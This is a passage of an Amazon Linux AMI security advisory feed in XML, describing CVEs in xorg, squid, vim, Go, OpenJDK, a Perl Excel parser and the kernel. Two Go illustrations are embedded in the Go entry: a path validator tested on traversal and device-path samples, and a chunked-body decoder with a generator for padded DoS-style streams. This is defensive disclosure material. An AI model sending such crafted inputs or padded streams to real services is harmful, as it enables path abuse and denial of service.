arch="i686"><filename>Packages/kernel-devel-4.14.334-177.552.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.334" release="177.552.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.334-177.552.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.334" release="177.552.amzn1" 
epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.334-177.552.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.334" release="177.552.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.334-177.552.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.334" release="177.552.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.334-177.552.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1900</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1900: important priority package update for xorg-x11-server</title><issued date="2024-01-03 22:37:00" /><updated date="2024-01-08 21:23:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-6478:
A flaw was found in xorg-server. A specially crafted request to RRChangeProviderProperty or RRChangeOutputProperty can trigger an integer overflow which may lead to a disclosure of sensitive information.
CVE-2023-6377:
A flaw was found in xorg-server. Querying or changing XKB button actions such as moving from a touchpad to a mouse can result in out-of-bounds memory reads and writes. This may allow local privilege escalation or possible remote code execution in cases where X11 forwarding is involved.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6377" title="" id="CVE-2023-6377" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6478" title="" id="CVE-2023-6478" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="xorg-x11-server-Xdmx" version="1.17.4" release="18.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xdmx-1.17.4-18.54.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.17.4" release="18.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-debuginfo-1.17.4-18.54.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xorg" version="1.17.4" release="18.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xorg-1.17.4-18.54.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-source" version="1.17.4" release="18.54.amzn1" epoch="0" arch="noarch"><filename>Packages/xorg-x11-server-source-1.17.4-18.54.amzn1.noarch.rpm</filename></package><package name="xorg-x11-server-devel" version="1.17.4" release="18.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-devel-1.17.4-18.54.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-common" version="1.17.4" release="18.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-common-1.17.4-18.54.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.17.4" release="18.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xephyr-1.17.4-18.54.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.17.4" release="18.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xvfb-1.17.4-18.54.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.17.4" release="18.54.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/xorg-x11-server-Xnest-1.17.4-18.54.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.17.4" release="18.54.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xephyr-1.17.4-18.54.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.17.4" release="18.54.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-debuginfo-1.17.4-18.54.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.17.4" release="18.54.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xvfb-1.17.4-18.54.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.17.4" release="18.54.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xnest-1.17.4-18.54.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-devel" version="1.17.4" release="18.54.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-devel-1.17.4-18.54.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xdmx" version="1.17.4" release="18.54.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xdmx-1.17.4-18.54.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xorg" version="1.17.4" release="18.54.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xorg-1.17.4-18.54.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-common" version="1.17.4" release="18.54.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-common-1.17.4-18.54.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1901</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1901: important priority package update for squid</title><issued date="2024-01-03 22:37:00" /><updated date="2024-01-08 21:23:00" 
/><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-49285:
Squid is a caching proxy for the Web supporting HTTP, HTTPS, FTP, and more. Due to a Buffer Overread bug Squid is vulnerable to a Denial of Service attack against Squid HTTP Message processing. This bug is fixed by Squid version 6.5. Users are advised to upgrade. There are no known workarounds for this vulnerability.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-49285" title="" id="CVE-2023-49285" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="squid-debuginfo" version="3.5.20" release="17.53.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-debuginfo-3.5.20-17.53.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.5.20" release="17.53.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-3.5.20-17.53.amzn1.x86_64.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="17.53.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-migration-script-3.5.20-17.53.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.5.20" release="17.53.amzn1" epoch="7" arch="i686"><filename>Packages/squid-3.5.20-17.53.amzn1.i686.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="17.53.amzn1" epoch="7" arch="i686"><filename>Packages/squid-migration-script-3.5.20-17.53.amzn1.i686.rpm</filename></package><package name="squid-debuginfo" version="3.5.20" release="17.53.amzn1" epoch="7" arch="i686"><filename>Packages/squid-debuginfo-3.5.20-17.53.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1902</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1902: low priority package update for vim</title><issued date="2024-01-03 22:37:00" /><updated date="2024-01-08 21:22:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-48237:
Vim is an open source command line text editor. In affected versions when shifting lines in operator pending mode and using a very large value, it may be possible to overflow the size of integer. Impact is low, user interaction is required and a crash may not even happen in all situations. This issue has been addressed in commit `6bf131888` which has been included in version 9.0.2112. Users are advised to upgrade. There are no known workarounds for this vulnerability.
CVE-2023-48236:
Vim is an open source command line text editor. When using the z= command, the user may overflow the count with values larger than MAX_INT. Impact is low, user interaction is required and a crash may not even happen in all situations. This vulnerability has been addressed in commit `73b2d379` which has been included in release version 9.0.2111. Users are advised to upgrade. There are no known workarounds for this vulnerability.
CVE-2023-48235:
Vim is an open source command line text editor. When parsing relative ex addresses one may unintentionally cause an overflow. Ironically this happens in the existing overflow check, because the line number becomes negative and LONG_MAX - lnum will cause the overflow. Impact is low, user interaction is required and a crash may not even happen in all situations. This issue has been addressed in commit `060623e` which has been included in release version 9.0.2110. Users are advised to upgrade. There are no known workarounds for this vulnerability.
CVE-2023-48234:
Vim is an open source command line text editor. When getting the count for a normal mode z command, it may overflow for large counts given. Impact is low, user interaction is required and a crash may not even happen in all situations. This issue has been addressed in commit `58f9befca1` which has been included in release version 9.0.2109. Users are advised to upgrade. There are no known workarounds for this vulnerability.
CVE-2023-48233:
Vim is an open source command line text editor. If the count after the :s command is larger than what fits into a (signed) long variable, abort with e_value_too_large. Impact is low, user interaction is required and a crash may not even happen in all situations. This issue has been addressed in commit `ac6378773` which has been included in release version 9.0.2108. Users are advised to upgrade. There are no known workarounds for this vulnerability.
CVE-2023-48231:
Vim is an open source command line text editor. When closing a window, vim may try to access already freed window structure. Exploitation beyond crashing the application has not been shown to be viable. This issue has been addressed in commit `25aabc2b` which has been included in release version 9.0.2106. Users are advised to upgrade. There are no known workarounds for this vulnerability.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48231" title="" id="CVE-2023-48231" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48233" title="" id="CVE-2023-48233" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48234" title="" id="CVE-2023-48234" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48235" title="" id="CVE-2023-48235" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48236" title="" id="CVE-2023-48236" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48237" title="" id="CVE-2023-48237" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="vim-data" version="9.0.2120" release="1.87.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-data-9.0.2120-1.87.amzn1.noarch.rpm</filename></package><package name="vim-enhanced" version="9.0.2120" release="1.87.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-enhanced-9.0.2120-1.87.amzn1.x86_64.rpm</filename></package><package name="vim-common" version="9.0.2120" release="1.87.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-common-9.0.2120-1.87.amzn1.x86_64.rpm</filename></package><package name="xxd" version="9.0.2120" release="1.87.amzn1" epoch="2" arch="x86_64"><filename>Packages/xxd-9.0.2120-1.87.amzn1.x86_64.rpm</filename></package><package name="vim-filesystem" version="9.0.2120" release="1.87.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-filesystem-9.0.2120-1.87.amzn1.noarch.rpm</filename></package><package name="vim-minimal" version="9.0.2120" release="1.87.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-minimal-9.0.2120-1.87.amzn1.x86_64.rpm</filename></package><package name="vim-debuginfo" version="9.0.2120" release="1.87.amzn1" epoch="2" 
arch="x86_64"><filename>Packages/vim-debuginfo-9.0.2120-1.87.amzn1.x86_64.rpm</filename></package><package name="xxd" version="9.0.2120" release="1.87.amzn1" epoch="2" arch="i686"><filename>Packages/xxd-9.0.2120-1.87.amzn1.i686.rpm</filename></package><package name="vim-minimal" version="9.0.2120" release="1.87.amzn1" epoch="2" arch="i686"><filename>Packages/vim-minimal-9.0.2120-1.87.amzn1.i686.rpm</filename></package><package name="vim-debuginfo" version="9.0.2120" release="1.87.amzn1" epoch="2" arch="i686"><filename>Packages/vim-debuginfo-9.0.2120-1.87.amzn1.i686.rpm</filename></package><package name="vim-common" version="9.0.2120" release="1.87.amzn1" epoch="2" arch="i686"><filename>Packages/vim-common-9.0.2120-1.87.amzn1.i686.rpm</filename></package><package name="vim-enhanced" version="9.0.2120" release="1.87.amzn1" epoch="2" arch="i686"><filename>Packages/vim-enhanced-9.0.2120-1.87.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1903</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1903: medium priority package update for golang</title><issued date="2024-01-03 22:37:00" /><updated date="2024-01-08 21:22:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-45284:
path/filepath: recognize device names with trailing spaces and superscripts
The IsLocal function did not correctly detect reserved names in some cases:
- reserved names followed by spaces, such as "COM1 ".
- "COM" or "LPT" followed by a superscript 1, 2, or 3.
IsLocal now correctly reports these names as non-local.
CVE-2023-45283:
path/filepath: recognize \??\ as a Root Local Device path prefix.
On Windows, a path beginning with \??\ is a Root Local Device path equivalent
to a path beginning with \\?\. Paths with a \??\ prefix may be used to
access arbitrary locations on the system. For example, the path \??\c:\x
is equivalent to the more common path c:\x.
The filepath package did not recognize paths with a \??\ prefix as special.
Clean could convert a rooted path such as \a\..\??\b into
the root local device path \??\b. It will now convert this
path into .\??\b.
IsAbs did not report paths beginning with \??\ as absolute.
It now does so.
VolumeName now reports the \??\ prefix as a volume name.
Join(`\`, `??`, `b`) could convert a seemingly innocent
sequence of path elements into the root local device path
\??\b. It will now convert this to \.\??\b.
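The following Go program is an added illustration for CVE-2023-45284 and CVE-2023-45283 above; it was written for this advisory and is not code from Go's path/filepath. It is a portable checker that applies the two rules the fixes add before a path is accepted as local to a base directory: COM/LPT names with trailing spaces or the superscript digits 1, 2, 3 are treated as reserved device names, and a \??\ prefix is treated like \\?\ as a Root Local Device path. The normalisation steps (case folding, cutting the element at its first '.', trimming trailing spaces and dots, folding / to \) and the decision to also reject a /??/ spelling are assumptions of this example, chosen to over-reject rather than under-reject; the function names are the example's own. It runs on Linux, where filepath itself applies no Windows rules.

```go
package main

import (
	"fmt"
	"strings"
)

// DOS device names that Windows reserves in every directory, with or without
// an extension.
var reservedDevices = map[string]bool{"CON": true, "PRN": true, "AUX": true, "NUL": true}

// isReservedWindowsName reports whether a single path element names a DOS
// device. Normalisation is an assumption of this example: fold case, ignore
// anything after the first '.', trim trailing spaces and dots, and accept the
// superscript digits ¹ ² ³ after COM or LPT as the digits 1 to 3, which is
// the case the CVE-2023-45284 fix added.
func isReservedWindowsName(elem string) bool {
	base := elem
	if i := strings.IndexByte(base, '.'); i >= 0 {
		base = base[:i]
	}
	base = strings.ToUpper(strings.TrimRight(base, " ."))
	if reservedDevices[base] {
		return true
	}
	for _, dev := range []string{"COM", "LPT"} {
		if !strings.HasPrefix(base, dev) {
			continue
		}
		switch base[len(dev):] {
		case "1", "2", "3", "4", "5", "6", "7", "8", "9", "¹", "²", "³":
			return true
		}
	}
	return false
}

// isRootLocalDevicePath reports whether p carries the \??\ or \\?\ prefix that
// hands the rest of the path to the Windows object manager unparsed. Forward
// slashes are folded to backslashes first; that is a deliberate over-rejection
// for a validator, not a claim about how Windows parses /??/.
func isRootLocalDevicePath(p string) bool {
	p = strings.ReplaceAll(p, "/", `\`)
	return strings.HasPrefix(p, `\??\`) || strings.HasPrefix(p, `\\?\`)
}

// isLocalWindowsPath is a conservative "safe to join under a base directory"
// check for a path that will later be used on Windows: it rejects device-path
// prefixes, anything containing ':' (drive letters, NTFS streams), rooted
// paths, ".." sequences that climb above the base, and any element that
// names a DOS device.
func isLocalWindowsPath(p string) bool {
	if p == "" || isRootLocalDevicePath(p) || strings.Contains(p, ":") {
		return false
	}
	norm := strings.ReplaceAll(p, "/", `\`)
	if strings.HasPrefix(norm, `\`) {
		return false
	}
	depth := 0
	for _, elem := range strings.Split(norm, `\`) {
		switch elem {
		case "", ".":
			continue
		case "..":
			depth--
			if 0 > depth {
				return false
			}
		default:
			if isReservedWindowsName(elem) {
				return false
			}
			depth++
		}
	}
	return true
}

func main() {
	// Constructed sample paths, covering both advisory cases.
	for _, p := range []string{`docs\report.txt`, `COM1 `, `LPT¹.log`, `\??\c:\x`, `a\..\..\x`, `logs/..`} {
		fmt.Printf("%-16q local=%v\n", p, isLocalWindowsPath(p))
	}
}
```

Of the sample paths only docs\report.txt and logs/.. are accepted; COM1 with a trailing space and LPT¹.log fail the reserved-name rule, \??\c:\x fails the device-prefix rule, and a\..\..\x climbs above the base.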
CVE-2023-39326:
A malicious HTTP sender can use chunk extensions to cause a receiver reading from a request or response body to read many more bytes from the network than are in the body. A malicious HTTP client can further exploit this to cause a server to automatically read a large amount of data (up to about 1GiB) when a handler fails to read the entire body of a request. Chunk extensions are a little-used HTTP feature which permit including additional metadata in a request or response body sent using the chunked encoding. The net/http chunked encoding reader discards this metadata. A sender can exploit this by inserting a large metadata segment with each byte transferred. The chunk reader now produces an error if the ratio of real body to encoded bytes grows too small.
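The following Go program is an added illustration for CVE-2023-39326, written for this advisory and not taken from the Go standard library: a minimal chunked-body decoder that discards chunk extensions, as net/http does, but charges every non-payload byte (chunk-size line, extension, CRLF, trailer) against an overhead budget and aborts once the payload stops earning it. The 4-to-1 credit and the 4096-byte ceiling are assumptions chosen for the example, not the constants of the upstream fix; decodeChunked and chunkStream are the example's own names, and chunkStream builds a constructed padded body of the kind the advisory describes.

```go
package main

import (
	"bufio"
	"bytes"
	"errors"
	"fmt"
	"io"
	"strconv"
	"strings"
)

// Assumed budget for this example (not the exact constants of the Go fix):
// each payload byte earns 4 bytes of allowed overhead, and decoding fails once
// the unearned overhead (size lines, chunk extensions, CRLFs, trailers) passes
// maxOverhead. A sender can therefore no longer make the receiver read an
// unbounded number of extension bytes per payload byte.
const maxOverhead = 4096

var errTooMuchOverhead = errors.New("chunked encoding contains too much non-data")

// decodeChunked decodes a chunked transfer-coded body and returns the payload.
// Chunk extensions are discarded, but every discarded byte is charged against
// the overhead budget.
func decodeChunked(r io.Reader) ([]byte, error) {
	br := bufio.NewReader(r)
	var body bytes.Buffer
	overhead := 0

	for {
		line, err := br.ReadString('\n')
		if err != nil {
			return nil, err
		}
		overhead += len(line)
		if overhead > maxOverhead {
			return nil, errTooMuchOverhead
		}
		// Strip CRLF, then drop the chunk extension (";name=value...") if any.
		sizeField := strings.TrimRight(line, "\r\n")
		if i := strings.IndexByte(sizeField, ';'); i >= 0 {
			sizeField = sizeField[:i]
		}
		size, err := strconv.ParseUint(strings.TrimSpace(sizeField), 16, 32)
		if err != nil {
			return nil, fmt.Errorf("bad chunk size %q: %w", sizeField, err)
		}
		if size == 0 {
			// Last chunk: consume trailer lines up to the empty line, still
			// charging them as overhead.
			for {
				t, err := br.ReadString('\n')
				if err != nil {
					return nil, err
				}
				overhead += len(t)
				if overhead > maxOverhead {
					return nil, errTooMuchOverhead
				}
				if strings.TrimRight(t, "\r\n") == "" {
					return body.Bytes(), nil
				}
			}
		}
		data := make([]byte, size)
		if _, err := io.ReadFull(br, data); err != nil {
			return nil, err
		}
		body.Write(data)
		// Payload earns overhead credit, but credit never accumulates below zero,
		// so a large early chunk cannot bankroll unlimited extensions later.
		overhead -= 4 * int(size)
		if 0 > overhead {
			overhead = 0
		}
		// The CRLF that terminates the chunk data is overhead too.
		crlf := make([]byte, 2)
		if _, err := io.ReadFull(br, crlf); err != nil {
			return nil, err
		}
		overhead += 2
	}
}

// chunkStream builds a constructed chunked body of n one-byte chunks, each
// carrying a chunk extension of extLen bytes, followed by the last chunk.
func chunkStream(n, extLen int) string {
	chunk := "1;" + strings.Repeat("a", extLen) + "\r\nx\r\n"
	return strings.Repeat(chunk, n) + "0\r\n\r\n"
}

func main() {
	b, err := decodeChunked(strings.NewReader("5;ext=1\r\nhello\r\n0\r\n\r\n"))
	fmt.Printf("ordinary body: %q err=%v\n", b, err)
	_, err = decodeChunked(strings.NewReader(chunkStream(1000, 20)))
	fmt.Println("padded body:", err)
}
```

An ordinary body with a small extension decodes normally, and ten padded one-byte chunks still fit the budget, but the 1000-chunk stream is rejected after roughly 187 chunks rather than being read to the end, which is the behaviour the fixed chunk reader enforces.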
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39326" title="" id="CVE-2023-39326" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45283" title="" id="CVE-2023-45283" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45284" title="" id="CVE-2023-45284" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang-misc" version="1.20.12" release="1.49.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.20.12-1.49.amzn1.noarch.rpm</filename></package><package name="golang-src" version="1.20.12" release="1.49.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.20.12-1.49.amzn1.noarch.rpm</filename></package><package name="golang-bin" version="1.20.12" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.20.12-1.49.amzn1.x86_64.rpm</filename></package><package name="golang-shared" version="1.20.12" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-shared-1.20.12-1.49.amzn1.x86_64.rpm</filename></package><package name="golang-tests" version="1.20.12" release="1.49.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.20.12-1.49.amzn1.noarch.rpm</filename></package><package name="golang-docs" version="1.20.12" release="1.49.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.20.12-1.49.amzn1.noarch.rpm</filename></package><package name="golang" version="1.20.12" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.20.12-1.49.amzn1.x86_64.rpm</filename></package><package name="golang-bin" version="1.20.12" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.20.12-1.49.amzn1.i686.rpm</filename></package><package name="golang-shared" version="1.20.12" release="1.49.amzn1" epoch="0" 
arch="i686"><filename>Packages/golang-shared-1.20.12-1.49.amzn1.i686.rpm</filename></package><package name="golang" version="1.20.12" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.20.12-1.49.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1904</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1904: medium priority package update for java-1.8.0-openjdk</title><issued date="2024-01-03 22:37:00" /><updated date="2024-01-08 21:22:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-22081:
Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK product of Oracle Java SE (component: JSSE). Supported versions that are affected are Oracle Java SE: 8u381, 8u381-perf, 11.0.20, 17.0.8, 20.0.2; Oracle GraalVM for JDK: 17.0.8 and 20.0.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTPS to compromise Oracle Java SE, Oracle GraalVM for JDK. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM for JDK. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2023-22067:
Vulnerability in Oracle Java SE (component: CORBA). Supported versions that are affected are Oracle Java SE: 8u381 and 8u381-perf. Easily exploitable vulnerability allows unauthenticated attacker with network access via CORBA to compromise Oracle Java SE. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE accessible data. Note: This vulnerability can only be exploited by supplying data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted Java applets, such as through a web service. CVSS 3.1 Base Score 5.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N).
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22067" title="" id="CVE-2023-22067" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22081" title="" id="CVE-2023-22081" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-src" version="1.8.0.392.b08" release="2.82.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.392.b08-2.82.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.392.b08" release="2.82.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.392.b08-2.82.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.392.b08" release="2.82.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.392.b08-2.82.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.392.b08" release="2.82.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.392.b08-2.82.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.392.b08" release="2.82.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.392.b08-2.82.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.392.b08" release="2.82.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.392.b08-2.82.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.392.b08" release="2.82.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.392.b08-2.82.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.392.b08" release="2.82.amzn1" epoch="1" 
arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.392.b08-2.82.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.392.b08" release="2.82.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.392.b08-2.82.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.392.b08" release="2.82.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.392.b08-2.82.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.392.b08" release="2.82.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.392.b08-2.82.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.392.b08" release="2.82.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.392.b08-2.82.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.392.b08" release="2.82.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.392.b08-2.82.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.392.b08" release="2.82.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.392.b08-2.82.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1905</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1905: important priority package update for perl-Spreadsheet-ParseExcel</title><issued date="2024-01-19 01:19:00" /><updated date="2024-01-23 18:19:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-7101:
Spreadsheet::ParseExcel version 0.65 is a Perl module used for parsing Excel files. Spreadsheet::ParseExcel is vulnerable to an arbitrary code execution (ACE) vulnerability due to passing unvalidated input from a file into a string-type "eval". Specifically, the issue stems from the evaluation of Number format strings (not to be confused with printf-style format strings) within the Excel parsing logic.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-7101" title="" id="CVE-2023-7101" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perl-Spreadsheet-ParseExcel" version="0.5900" release="5.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Spreadsheet-ParseExcel-0.5900-5.3.amzn1.x86_64.rpm</filename></package><package name="perl-Spreadsheet-ParseExcel" version="0.5900" release="5.3.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Spreadsheet-ParseExcel-0.5900-5.3.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1906</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1906: important priority package update for kernel</title><issued date="2024-01-19 01:19:00" /><updated date="2024-01-23 18:19:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-6606:
An out-of-bounds read vulnerability was found in smbCalcSize in fs/smb/client/netmisc.c in the Linux Kernel. This issue could allow a local attacker to crash the system or leak internal kernel information.
